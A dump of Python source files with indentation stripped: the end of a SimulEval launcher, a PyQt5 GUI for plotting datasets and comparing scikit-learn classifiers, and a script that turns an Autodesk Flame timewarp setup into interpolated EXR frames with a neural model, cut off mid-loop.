if __name__ == "__main__":
try:
import simuleval
importlib.import_module("neurst.utils.simuleval_agents")
_ = simuleval
except ModuleNotFoundError:
raise ModuleNotFoundError(
"Please install simuleval via: \n"
"\tgit clone https://github.com/facebookresearch/SimulEval.git\n"
"\tpip3 install -e SimulEval/")
parser = options.general_parser()
options.add_server_args(parser)
args, _ = parser.parse_known_args()
if not args.server_only:
_main(args.client_only)
else:
server()
|
dagr_rev02.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 6 16:25:14 2019
@author: adsims
"""
from PyQt5.uic import loadUiType
import sys
from PyQt5 import QtWidgets, QtCore, uic
import numpy as np
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import (
FigureCanvasQTAgg as FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
import threading
import dagr_backend
__author__ = "Andrew Sims, Michael Hudson"
__copyright__ = "None"
__license__ = "None"
__version__ = "0.2"
__maintainer__ = "Andrew Sims, Michael Hudson"
__email__ = "andrew.sims.d@gmail.com"
__status__ = "Prototype"
Ui_MainWindow, QMainWindow = loadUiType('DAGR.ui')
class Gui(QMainWindow, Ui_MainWindow):
def __init__(self, ):
super(Gui, self).__init__()
self.setupUi(self)
self.dataset_fig_dict = {}
self.algorithim_fig_dict = {}
self.learning_curve_fig_dict = {}
self.pb_begin_analysis = self.findChild(QtWidgets.QPushButton, 'pb_begin_analysis')
self.pb_begin_analysis.clicked.connect(self.begin_analysis)
self.cb_feature_box_and_whisker = self.findChild(QtWidgets.QCheckBox, 'cb_feature_box_and_whisker')
self.cb_correlation_matrix = self.findChild(QtWidgets.QCheckBox, 'cb_correlation_matrix')
self.cb_feature_histogram = self.findChild(QtWidgets.QCheckBox, 'cb_feature_histogram')
self.cb_raw_features = self.findChild(QtWidgets.QCheckBox, 'cb_raw_features')
self.cb_scatter_matrix = self.findChild(QtWidgets.QCheckBox, 'cb_scatter_matrix')
# self.html_viewer = self.findChild(QtWebEngineWidgets.QWebEngineView, 'webEngineView')
self.dataset_prog = self.findChild(QtWidgets.QProgressBar, 'dataset_prog')
self.algorithim_prog = self.findChild(QtWidgets.QProgressBar, 'algorithim_prog')
self.cb_adaboost = self.findChild(QtWidgets.QCheckBox, 'cb_adaboost')
self.cb_dtc = self.findChild(QtWidgets.QCheckBox, 'cb_dtc')
self.cb_gaussian_process = self.findChild(QtWidgets.QCheckBox, 'cb_gaussian_process')
self.cb_linear_svm = self.findChild(QtWidgets.QCheckBox, 'cb_linear_svm')
self.cb_naive_bayes = self.findChild(QtWidgets.QCheckBox, 'cb_naive_bayes')
self.cb_nearest_neighbors = self.findChild(QtWidgets.QCheckBox, 'cb_nearest_neighbors')
self.cb_neural_network = self.findChild(QtWidgets.QCheckBox, 'cb_neural_network')
self.cb_qda = self.findChild(QtWidgets.QCheckBox, 'cb_qda')
self.cb_random_forest = self.findChild(QtWidgets.QCheckBox, 'cb_random_forest')
self.cb_rbf_svm = self.findChild(QtWidgets.QCheckBox, 'cb_rbf_svm')
self.dataset_mpl_figs.itemClicked.connect(self.dataset_changefig)
self.algorithim_mpl_figs.itemClicked.connect(self.algorithim_changefig)
self.learning_curve_mpl_figs.itemClicked.connect(self.learning_curve_changefig)
datset_base_fig = Figure()
self.dataset_addmpl(datset_base_fig)
algorithim_base_fig = Figure()
self.algorithim_addmpl(algorithim_base_fig)
learning_curve_base_fig = Figure()
self.learning_curve_addmpl(learning_curve_base_fig)
def begin_analysis(self,):
# with open(r'C:/Users/andre/Documents/Data Analysis/bokeh_test_file.html', 'r') as fh:
# file = fh.read()
# self.html_viewer.setHtml(file)
df, feature_names = dagr_backend.gen_dataset()
dataset_figs = {}
if self.cb_feature_box_and_whisker.isChecked():
dataset_figs['Feature Box Plot'] = dagr_backend.plot_feature_box(df, feature_names)
if self.cb_correlation_matrix.isChecked():
dataset_figs['Correlation Matrix'] = dagr_backend.plot_corr_mat(df, feature_names)
if self.cb_feature_histogram.isChecked():
dataset_figs['Histograms'] = dagr_backend.plot_histograms(df, feature_names)
if self.cb_raw_features.isChecked():
dataset_figs['Raw Features'] = dagr_backend.plot_raw_features(df, feature_names)
if self.cb_scatter_matrix.isChecked():
dataset_figs['Scatter Matrix'] = dagr_backend.plot_scatter_matrix(df, feature_names)
algorithims_to_use = []
if self.cb_adaboost.isChecked():
algorithims_to_use.append('adaboost')
if self.cb_dtc.isChecked():
algorithims_to_use.append('dtc')
if self.cb_gaussian_process.isChecked():
algorithims_to_use.append('gaussian_process')
if self.cb_linear_svm.isChecked():
algorithims_to_use.append('linear_svm')
if self.cb_naive_bayes.isChecked():
algorithims_to_use.append('naive_bayes')
if self.cb_nearest_neighbors.isChecked():
algorithims_to_use.append('nearest_neighbors')
if self.cb_neural_network.isChecked():
algorithims_to_use.append('neural_network')
if self.cb_qda.isChecked():
algorithims_to_use.append('qda')
if self.cb_random_forest.isChecked():
algorithims_to_use.append('random_forest')
if self.cb_rbf_svm.isChecked():
algorithims_to_use.append('rbf_svm')
models = dagr_backend.build_models(df, feature_names, algorithims_to_use)
algorithim_fig_list = []
learning_curve_fig_list = []
algorithim_fig_list.append(('Algorithim Accuracy', dagr_backend.plot_algorithim_accuracy(df, feature_names, models)))
for model in models:
model_name = model.steps[-1][0]
# x = threading.Thread(target=self.append_figure(), args=(algorithim_fig_list, model_name, dagr_backend.plot_algorithim_class_space(), (df, feature_names, model)))
# x.start()
algorithim_fig_list.append((model_name, dagr_backend.plot_algorithim_class_space(df, feature_names, model)))
learning_curve_fig_list.append(
(
model_name,
dagr_backend.plot_learning_curve_(df, feature_names, model)
)
)
for i, (name, figure) in enumerate(dataset_figs.items()):
self.dataset_prog.setValue(((i+1)/len(dataset_figs))*100)
gui.dataset_addfig(name, figure)
for i, (name, figure) in enumerate(algorithim_fig_list):
self.algorithim_prog.setValue(((i+1)/len(algorithim_fig_list))*100)
gui.algorithim_addfig(name, figure)
for name, figure in learning_curve_fig_list:
gui.learning_curve_addfig(name, figure)
def append_figure(lst, model_name, func, func_args):
lst.append((model_name, func(func_args)))
def dataset_changefig(self, item):
text = item.text()
self.dataset_rmmpl()
self.dataset_addmpl(self.dataset_fig_dict[text])
def dataset_addfig(self, name, fig):
self.dataset_fig_dict[name] = fig
self.dataset_mpl_figs.addItem(name)
def dataset_addmpl(self, fig):
self.dataset_canvas = FigureCanvas(fig)
self.dataset_mplvl.addWidget(self.dataset_canvas)
self.dataset_canvas.draw()
self.toolbar = NavigationToolbar(self.dataset_canvas,
self.dataset_mpl_window, coordinates=True)
self.dataset_mplvl.addWidget(self.toolbar)
def dataset_rmmpl(self,):
self.dataset_mplvl.removeWidget(self.dataset_canvas)
self.dataset_canvas.close()
self.dataset_mplvl.removeWidget(self.toolbar)
self.toolbar.close()
def algorithim_changefig(self, item):
text = item.text()
self.algorithim_rmmpl()
self.algorithim_addmpl(self.algorithim_fig_dict[text])
def algorithim_addfig(self, name, fig):
self.algorithim_fig_dict[name] = fig
self.algorithim_mpl_figs.addItem(name)
def algorithim_addmpl(self, fig):
self.algorithim_canvas = FigureCanvas(fig)
self.algorithim_mplvl.addWidget(self.algorithim_canvas)
self.algorithim_canvas.draw()
self.toolbar = NavigationToolbar(self.algorithim_canvas,
self.algorithim_mpl_window, coordinates=True)
self.algorithim_mplvl.addWidget(self.toolbar)
def algorithim_rmmpl(self,):
self.algorithim_mplvl.removeWidget(self.algorithim_canvas)
self.algorithim_canvas.close()
self.algorithim_mplvl.removeWidget(self.toolbar)
self.toolbar.close()
def learning_curve_changefig(self, item):
text = item.text()
self.learning_curve_rmmpl()
self.learning_curve_addmpl(self.learning_curve_fig_dict[text])
def learning_curve_addfig(self, name, fig):
self.learning_curve_fig_dict[name] = fig
self.learning_curve_mpl_figs.addItem(name)
def learning_curve_addmpl(self, fig):
self.learning_curve_canvas = FigureCanvas(fig)
self.learning_curve_mplvl.addWidget(self.learning_curve_canvas)
self.learning_curve_canvas.draw()
self.toolbar = NavigationToolbar(self.learning_curve_canvas,
self.learning_curve_mpl_window, coordinates=True)
self.learning_curve_mplvl.addWidget(self.toolbar)
def learning_curve_rmmpl(self,):
self.learning_curve_mplvl.removeWidget(self.learning_curve_canvas)
self.learning_curve_canvas.close()
self.learning_curve_mplvl.removeWidget(self.toolbar)
self.toolbar.close()
def closeEvent(self, ce):
#prevents blocking after each run
QtWidgets.QApplication.quit()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
app.processEvents()
gui = Gui()
gui.show()
sys.exit(app.exec_())
|
inference_flame_tw.py
|
from ntpath import basename
import os
import sys
from turtle import backward, forward
import cv2
import torch
import argparse
import numpy as np
from tqdm import tqdm
from torch.nn import functional as F
import warnings
import _thread
from queue import Queue, Empty
from pprint import pprint, pformat
import time
import psutil
import signal
import multiprocessing as mp
import inference_common
warnings.filterwarnings("ignore")
IOThreadsFlag = True
IOProcesses = []
cv2.setNumThreads(1)
# Exception handler
def exeption_handler(exctype, value, tb):
import traceback
locks = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'locks')
cmd = 'rm -f ' + locks + '/*'
# os.system(cmd)
pprint('%s in %s' % (value, exctype))
pprint(traceback.format_exception(exctype, value, tb))
sys.__excepthook__(exctype, value, tb)
input("Press Enter to continue...")
sys.excepthook = exeption_handler
# ctrl+c handler
def signal_handler(sig, frame):
global IOThreadsFlag
IOThreadsFlag = False
time.sleep(0.1)
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def clear_write_buffer(args, write_buffer, output_duration):
global IOThreadsFlag
global IOProcesses
cv2_flags = []
if args.bit_depth != 32:
cv2_flags = [cv2.IMWRITE_EXR_TYPE, cv2.IMWRITE_EXR_TYPE_HALF]
number_of_write_threads = 4
print('rendering %s frames to %s' % (output_duration, args.output))
pbar = tqdm(total=output_duration, unit='frame')
while IOThreadsFlag:
alive_processes = []
for process in IOProcesses:
if process.is_alive():
alive_processes.append(process)
else:
process.join(timeout=0)
IOProcesses = list(alive_processes)
item = write_buffer.get()
frame_number, image_data = item
if frame_number == -1:
pbar.close() # type: ignore
IOThreadsFlag = False
break
path = os.path.join(os.path.abspath(args.output), '{:0>7d}.exr'.format(frame_number))
if len(IOProcesses) < number_of_write_threads:
try:
p = mp.Process(target=cv2.imwrite, args=(path, image_data[:, :, ::-1], cv2_flags, ))
p.start()
IOProcesses.append(p)
except:
try:
cv2.imwrite(path, image_data[:, :, ::-1], cv2_flags)
except Exception as e:
print ('Error wtiring %s: %s' % (path, e))
else:
try:
cv2.imwrite(path, image_data[:, :, ::-1], cv2_flags)
except Exception as e:
print ('Error wtiring %s: %s' % (path, e))
pbar.update(1)
def build_read_buffer(user_args, read_buffer, videogen):
global IOThreadsFlag
for frame in videogen:
frame_data = cv2.imread(os.path.join(user_args.input, frame), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
read_buffer.put(frame_data)
read_buffer.put(None)
def make_inference_rational(model, I0, I1, ratio, rthreshold=0.02, maxcycles=5, scale=1.0, always_interp=False):
I0_ratio = 0.0
I1_ratio = 1.0
rational_m = torch.mean(I0) * ratio + torch.mean(I1) * (1 - ratio)
if not always_interp:
if ratio <= I0_ratio + rthreshold / 2:
return I0
if ratio >= I1_ratio - rthreshold / 2:
return I1
for inference_cycle in range(0, maxcycles):
middle = model.inference(I0, I1, scale)
middle_ratio = (I0_ratio + I1_ratio) / 2
if not always_interp:
if ratio - (rthreshold / 2) <= middle_ratio <= ratio + (rthreshold / 2):
return middle # + (rational_m - torch.mean(middle)).expand_as(middle)
if ratio > middle_ratio:
I0 = middle
I0_ratio = middle_ratio
else:
I1 = middle
I1_ratio = middle_ratio
return middle # + (rational_m - torch.mean(middle)).expand_as(middle)
def make_inference_rational_cpu(model, I0, I1, ratio, frame_num, w, h, write_buffer, rthreshold=0.02, maxcycles=8, scale=1.0, always_interp=False):
device = torch.device("cpu")
torch.set_grad_enabled(False)
I0_ratio = 0.0
I1_ratio = 1.0
rational_m = torch.mean(I0) * ratio + torch.mean(I1) * (1 - ratio)
if not always_interp:
if ratio <= I0_ratio + rthreshold / 2:
I0 = (((I0[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, I0[:h, :w]))
return
if ratio >= I1_ratio - rthreshold / 2:
I1 = (((I1[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, I1[:h, :w]))
return
for inference_cycle in range(0, maxcycles):
middle = model.inference(I0, I1, scale)
middle_ratio = (I0_ratio + I1_ratio) / 2
if not always_interp:
if ratio - (rthreshold / 2) <= middle_ratio <= ratio + (rthreshold / 2):
# middle = middle + (rational_m - torch.mean(middle)).expand_as(middle)
middle = (((middle[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, middle[:h, :w]))
return
if ratio > middle_ratio:
middle = middle.detach()
I0 = middle.to(device, non_blocking=True)
I0_ratio = middle_ratio
else:
middle = middle.detach()
I1 = middle.to(device, non_blocking=True)
I1_ratio = middle_ratio
# middle + (rational_m - torch.mean(middle)).expand_as(middle)
middle = (((middle[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, middle[:h, :w]))
return
def dictify(r, root=True):
from copy import copy
if root:
return {r.tag: dictify(r, False)}
d = copy(r.attrib)
if r.text:
d["_text"] = r.text
for x in r.findall("./*"):
if x.tag not in d:
d[x.tag] = []
d[x.tag].append(dictify(x, False))
return d
def bake_flame_tw_setup(tw_setup_path, start, end):
# parses tw setup from flame and returns dictionary
# with baked frame - value pairs
def extrapolate_linear(xa, ya, xb, yb, xc):
m = (ya - yb) / (xa - xb)
yc = (xc - xb) * m + yb
return yc
import xml.etree.ElementTree as ET
frame_value_map = {}
with open(tw_setup_path, 'r') as tw_setup_file:
tw_setup_string = tw_setup_file.read()
tw_setup_file.close()
tw_setup_xml = ET.fromstring(tw_setup_string)
tw_setup = dictify(tw_setup_xml)
# start = int(tw_setup['Setup']['Base'][0]['Range'][0]['Start'])
# end = int(tw_setup['Setup']['Base'][0]['Range'][0]['End'])
# TW_Timing_size = int(tw_setup['Setup']['State'][0]['TW_Timing'][0]['Channel'][0]['Size'][0]['_text'])
TW_SpeedTiming_size = int(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['Size'][0]['_text'])
TW_RetimerMode = int(tw_setup['Setup']['State'][0]['TW_RetimerMode'][0]['_text'])
parsed_and_baked_path = os.path.join(os.path.dirname(args.setup), 'parsed_and_baked.txt')
if sys.platform == 'darwin':
parser_and_baker = os.path.join(os.path.dirname(__file__), 'flame_channel_parser', 'bin', 'bake_flame_channel_mac')
else:
parser_and_baker = os.path.join(os.path.dirname(__file__), 'flame_channel_parser', 'bin', 'bake_flame_channel')
if TW_SpeedTiming_size == 1 and TW_RetimerMode == 0:
# just constant speed change with no keyframes set
x = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['Frame'][0]['_text'])
y = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['Value'][0]['_text'])
ldx = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['LHandle_dX'][0]['_text'])
ldy = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['LHandle_dY'][0]['_text'])
rdx = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['RHandle_dX'][0]['_text'])
rdy = float(tw_setup['Setup']['State'][0]['TW_SpeedTiming'][0]['Channel'][0]['KFrames'][0]['Key'][0]['RHandle_dY'][0]['_text'])
for frame_number in range(start, end+1):
frame_value_map[frame_number] = extrapolate_linear(x + ldx, y + ldy, x + rdx, y + rdy, frame_number)
return frame_value_map
# add point tangents from vecrors to match older version of setup
# used by Julik's parser
from xml.dom import minidom
xml = minidom.parse(tw_setup_path)
keys = xml.getElementsByTagName('Key')
for key in keys:
frame = key.getElementsByTagName('Frame')
if frame:
frame = (frame[0].firstChild.nodeValue)
value = key.getElementsByTagName('Value')
if value:
value = (value[0].firstChild.nodeValue)
rdx = key.getElementsByTagName('RHandle_dX')
if rdx:
rdx = (rdx[0].firstChild.nodeValue)
rdy = key.getElementsByTagName('RHandle_dY')
if rdy:
rdy = (rdy[0].firstChild.nodeValue)
ldx = key.getElementsByTagName('LHandle_dX')
if ldx:
ldx = (ldx[0].firstChild.nodeValue)
ldy = key.getElementsByTagName('LHandle_dY')
if ldy:
ldy = (ldy[0].firstChild.nodeValue)
lx = xml.createElement('LHandleX')
lx.appendChild(xml.createTextNode('{:.6f}'.format(float(frame) + float(ldx))))
key.appendChild(lx)
ly = xml.createElement('LHandleY')
ly.appendChild(xml.createTextNode('{:.6f}'.format(float(value) + float(ldy))))
key.appendChild(ly)
rx = xml.createElement('RHandleX')
rx.appendChild(xml.createTextNode('{:.6f}'.format(float(frame) + float(rdx))))
key.appendChild(rx)
ry = xml.createElement('RHandleY')
ry.appendChild(xml.createTextNode('{:.6f}'.format(float(value) + float(rdy))))
key.appendChild(ry)
xml_string = xml.toxml()
dirname, name = os.path.dirname(tw_setup_path), os.path.basename(tw_setup_path)
xml_path = os.path.join(dirname, 'fix_' + name)
with open(xml_path, 'a') as xml_file:
xml_file.write(xml_string)
xml_file.close()
intp_start = start
intp_end = end
if TW_RetimerMode == 0:
tw_speed = {}
tw_speed_frames = []
TW_Speed = xml.getElementsByTagName('TW_Speed')
keys = TW_Speed[0].getElementsByTagName('Key')
for key in keys:
index = key.getAttribute('Index')
frame = key.getElementsByTagName('Frame')
if frame:
frame = (frame[0].firstChild.nodeValue)
value = key.getElementsByTagName('Value')
if value:
value = (value[0].firstChild.nodeValue)
tw_speed[int(index)] = {'frame': int(frame), 'value': float(value)}
tw_speed_frames.append(int(frame))
intp_start = min(start, min(tw_speed_frames))
intp_end = max(end, max(tw_speed_frames))
else:
tw_timing = {}
tw_timing_frames = []
TW_Timing = xml.getElementsByTagName('TW_Timing')
keys = TW_Timing[0].getElementsByTagName('Key')
for key in keys:
index = key.getAttribute('Index')
frame = key.getElementsByTagName('Frame')
if frame:
frame = (frame[0].firstChild.nodeValue)
value = key.getElementsByTagName('Value')
if value:
value = (value[0].firstChild.nodeValue)
tw_timing[int(index)] = {'frame': int(frame), 'value': float(value)}
tw_timing_frames.append(int(frame))
intp_start = min(start, min(tw_timing_frames))
intp_end = max(end, max(tw_timing_frames))
tw_channel_name = 'Speed' if TW_RetimerMode == 0 else 'Timing'
cmd = parser_and_baker + ' -c ' + tw_channel_name
cmd += ' -s ' + str(intp_start) + ' -e ' + str(intp_end)
cmd += ' --to-file ' + parsed_and_baked_path + ' ' + xml_path
os.system(cmd)
if not os.path.isfile(parsed_and_baked_path):
print ('can not find parsed channel file %s' % parsed_and_baked_path)
input("Press Enter to continue...")
sys.exit(1)
tw_channel = {}
with open(parsed_and_baked_path, 'r') as parsed_and_baked:
import re
# taken from Julik's parser
CORRELATION_RECORD = re.compile(
r"""
^([-]?\d+) # -42 or 42
\t # tab
(
[-]?(\d+(\.\d*)?) # "-1" or "1" or "1.0" or "1."
| # or:
\.\d+ # ".2"
)
([eE][+-]?[0-9]+)? # "1.2e3", "1.2e-3" or "1.2e+3"
$
""", re.VERBOSE)
lines = parsed_and_baked.readlines()
for i, line in enumerate(lines):
line = line.rstrip()
m = CORRELATION_RECORD.match(line)
if m is not None:
frame_number = int(m.group(1))
value = float(m.group(2))
tw_channel[frame_number] = value
if TW_RetimerMode == 1:
# job's done for 'Timing' channel
return tw_channel
else:
# speed - based timewarp needs a bit more love
# to solve frame values against speed channel
# with the help of anchor frames in SpeedTiming channel
tw_speed_timing = {}
TW_SpeedTiming = xml.getElementsByTagName('TW_SpeedTiming')
keys = TW_SpeedTiming[0].getElementsByTagName('Key')
for key in keys:
index = key.getAttribute('Index')
frame = key.getElementsByTagName('Frame')
if frame:
frame = (frame[0].firstChild.nodeValue)
value = key.getElementsByTagName('Value')
if value:
value = (value[0].firstChild.nodeValue)
tw_speed_timing[int(index)] = {'frame': int(frame), 'value': float(value)}
if tw_speed_timing[0]['frame'] > start:
# we need to extrapolate backwards from the first
# keyframe in SpeedTiming channel
anchor_frame_value = tw_speed_timing[0]['value']
for frame_number in range(tw_speed_timing[0]['frame'] - 1, start - 1, -1):
if frame_number + 1 not in tw_channel.keys() or frame_number not in tw_channel.keys():
step_back = tw_channel[min(list(tw_channel.keys()))] / 100
else:
step_back = (tw_channel[frame_number + 1] + tw_channel[frame_number]) / 200
frame_value_map[frame_number] = anchor_frame_value - step_back
anchor_frame_value = frame_value_map[frame_number]
# build up frame values between keyframes of SpeedTiming channel
for key_frame_index in range(0, len(tw_speed_timing.keys()) - 1):
# The value from my gess algo is close to the one in flame but not exact
# and error is accumulated. SO quick and dirty way is to do forward
# and backward pass and mix them rationally
range_start = tw_speed_timing[key_frame_index]['frame']
range_end = tw_speed_timing[key_frame_index + 1]['frame']
if range_end == range_start + 1:
# keyframes on next frames, no need to interpolate
frame_value_map[range_start] = tw_speed_timing[key_frame_index]['value']
frame_value_map[range_end] = tw_speed_timing[key_frame_index + 1]['value']
continue
forward_pass = {}
anchor_frame_value = tw_speed_timing[key_frame_index]['value']
forward_pass[range_start] = anchor_frame_value
for frame_number in range(range_start + 1, range_end):
if frame_number + 1 not in tw_channel.keys() or frame_number not in tw_channel.keys():
step = tw_channel[max(list(tw_channel.keys()))] / 100
else:
step = (tw_channel[frame_number] + tw_channel[frame_number + 1]) / 200
forward_pass[frame_number] = anchor_frame_value + step
anchor_frame_value = forward_pass[frame_number]
forward_pass[range_end] = tw_speed_timing[key_frame_index + 1]['value']
backward_pass = {}
anchor_frame_value = tw_speed_timing[key_frame_index + 1]['value']
backward_pass[range_end] = anchor_frame_value
for frame_number in range(range_end - 1, range_start -1, -1):
if frame_number + 1 not in tw_channel.keys() or frame_number not in tw_channel.keys():
step_back = tw_channel[min(list(tw_channel.keys()))] / 100
else:
step_back = (tw_channel[frame_number + 1] + tw_channel[frame_number]) / 200
backward_pass[frame_number] = anchor_frame_value - step_back
anchor_frame_value = backward_pass[frame_number]
backward_pass[range_start] = tw_speed_timing[key_frame_index]['value']
# create easy in and out soft mixing curve
import numpy as np
from scipy import interpolate
ctr =np.array( [(0 , 0), (0.1, 0), (0.9, 1), (1, 1)])
x=ctr[:,0]
y=ctr[:,1]
interp = interpolate.CubicSpline(x, y)
work_range = list(forward_pass.keys())
ratio = 0
rstep = 1 / len(work_range)
for frame_number in sorted(work_range):
frame_value_map[frame_number] = forward_pass[frame_number] * (1 - interp(ratio)) + backward_pass[frame_number] * interp(ratio)
ratio += rstep
last_key_index = list(sorted(tw_speed_timing.keys()))[-1]
if tw_speed_timing[last_key_index]['frame'] < end:
# we need to extrapolate further on from the
# last keyframe in SpeedTiming channel
anchor_frame_value = tw_speed_timing[last_key_index]['value']
frame_value_map[tw_speed_timing[last_key_index]['frame']] = anchor_frame_value
for frame_number in range(tw_speed_timing[last_key_index]['frame'] + 1, end + 1):
if frame_number + 1 not in tw_channel.keys() or frame_number not in tw_channel.keys():
step = tw_channel[max(list(tw_channel.keys()))] / 100
else:
step = (tw_channel[frame_number] + tw_channel[frame_number + 1]) / 200
frame_value_map[frame_number] = anchor_frame_value + step
anchor_frame_value = frame_value_map[frame_number]
return frame_value_map
if __name__ == '__main__':
start = time.time()
msg = 'Timewarp using FX setup from Flame\n'
parser = argparse.ArgumentParser(description=msg)
parser.add_argument('--input', dest='input', type=str, default=None, help='folder with input sequence')
parser.add_argument('--output', dest='output', type=str, default=None, help='folder to output sequence to')
parser.add_argument('--setup', dest='setup', type=str, default=None, help='flame tw setup to use')
parser.add_argument('--record_in', dest='record_in', type=int, default=1, help='record in point relative to tw setup')
parser.add_argument('--record_out', dest='record_out', type=int, default=0, help='record out point relative to tw setup')
parser.add_argument('--model', dest='model', type=str, default='./trained_models/default/v2.0.model')
parser.add_argument('--cpu', dest='cpu', action='store_true', help='do not use GPU at all, process only on CPU')
parser.add_argument('--flow_scale', dest='flow_scale', type=float, help='motion analysis resolution scale')
parser.add_argument('--bit_depth', dest='bit_depth', type=int, default=16)
args = parser.parse_args()
if (args.output is None or args.input is None or args.setup is None):
parser.print_help()
sys.exit()
print('Initializing TimewarpML from Flame setup...')
img_formats = ['.exr',]
src_files_list = []
for f in os.listdir(args.input):
name, ext = os.path.splitext(f)
if ext in img_formats:
src_files_list.append(f)
input_duration = len(src_files_list)
if not input_duration:
print('not enough input frames: %s given' % input_duration)
input("Press Enter to continue...")
sys.exit()
if not args.record_out:
args.record_out = input_duration
frame_value_map = bake_flame_tw_setup(args.setup, args.record_in, args.record_out)
# input("Press Enter to continue...")
# sys.exit(0)
start_frame = 1
src_files_list.sort()
src_files = {x:os.path.join(args.input, file_path) for x, file_path in enumerate(src_files_list, start=start_frame)}
output_folder = os.path.abspath(args.output)
if not os.path.exists(output_folder):
os.makedirs(output_folder)
output_duration = (args.record_out - args.record_in) + 1
if torch.cuda.is_available() and not args.cpu:
# Process on GPU
model = inference_common.load_model(args.model)
model.eval()
model.device()
print ('Trained model loaded: %s' % args.model)
write_buffer = Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, output_duration))
src_start_frame = cv2.imread(src_files.get(start_frame), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
h, w, _ = src_start_frame.shape
pv = max(32, int(32 / args.flow_scale))
ph = ((h - 1) // pv + 1) * pv
pw = ((w - 1) // pv + 1) * pv
padding = (0, pw - w, 0, ph - h)
device = torch.device("cuda")
torch.set_grad_enabled(False)
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
output_frame_number = 1
for frame_number in range(args.record_in, args.record_out +1):
I0_frame_number = int(frame_value_map[frame_number])
if I0_frame_number < 1:
I0_image = cv2.imread(src_files.get(1), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
write_buffer.put((output_frame_number, I0_image))
output_frame_number += 1
continue
if I0_frame_number >= input_duration:
I0_image = cv2.imread(src_files.get(input_duration), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
write_buffer.put((output_frame_number, I0_image))
output_frame_number += 1
continue
I1_frame_number = I0_frame_number + 1
ratio = frame_value_map[frame_number] - int(frame_value_map[frame_number])
# pprint ('frame_number: %s, value: %s' % (frame_number, frame_value_map[frame_number]))
# pprint ('I0_frame_number: %s, I1_frame_number: %s, ratio: %s' % (I0_frame_number, I1_frame_number, ratio))
I0_image = cv2.imread(src_files.get(I0_frame_number), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
I1_image = cv2.imread(src_files.get(I1_frame_number), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
I0 = torch.from_numpy(np.transpose(I0_image, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
I1 = torch.from_numpy(np.transpose(I1_image, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
I0 = F.pad(I0, padding)
I1 = F.pad(I1, padding)
mid = make_inference_rational(model, I0, I1, ratio, scale = args.flow_scale)
mid = (((mid[0]).cpu().numpy().transpose(1, 2, 0)))
write_buffer.put((output_frame_number, mid[:h, :w]))
output_frame_number += 1
# send write loop exit code
write_buffer.put((-1, -1))
# it should put IOThreadsFlag to False it return
while(IOThreadsFlag):
time.sleep(0.01)
else:
# process on GPU
model = inference_common.load_model(args.model, cpu=True)
model.eval()
model.device()
print ('Trained model loaded: %s' % args.model)
src_start_frame = cv2.imread(src_files.get(start_frame), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
h, w, _ = src_start_frame.shape
pv = max(32, int(32 / args.flow_scale))
ph = ((h - 1) // pv + 1) * pv
pw = ((w - 1) // pv + 1) * pv
padding = (0, pw - w, 0, ph - h)
device = torch.device('cpu')
torch.set_grad_enabled(False)
sim_workers, thread_ram = inference_common.safe_threads_number(h, w)
'''
max_cpu_workers = mp.cpu_count() - 2
available_ram = psutil.virtual_memory()[1]/( 1024 ** 3 )
megapixels = ( h * w ) / ( 10 ** 6 )
thread_ram = megapixels * 2.4
sim_workers = round( available_ram / thread_ram )
if sim_workers < 1:
sim_workers = 1
elif sim_workers > max_cpu_workers:
sim_workers = max_cpu_workers
print ('---\nFree RAM: %s Gb available' % '{0:.1f}'.format(available_ram))
print ('Image size: %s x %s' % ( w, h,))
print ('Peak memory usage estimation: %s Gb per CPU thread ' % '{0:.1f}'.format(thread_ram))
print ('Using %s CPU worker thread%s (of %s available)\n---' % (sim_workers, '' if sim_workers == 1 else 's', mp.cpu_count()))
if thread_ram > available_ram:
print ('Warning: estimated peak memory usage is greater then RAM avaliable')
'''
write_buffer = mp.Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, input_duration))
active_workers = []
output_frame_number = 1
last_thread_time = time.time()
for frame_number in range(args.record_in, args.record_out +1):
I0_frame_number = int(frame_value_map[frame_number])
if I0_frame_number < 1:
I0_image = cv2.imread(src_files.get(1), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
write_buffer.put((output_frame_number, I0_image))
output_frame_number += 1
continue
if I0_frame_number >= input_duration:
I0_image = cv2.imread(src_files.get(input_duration), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
write_buffer.put((output_frame_number, I0_image))
output_frame_number += 1
continue
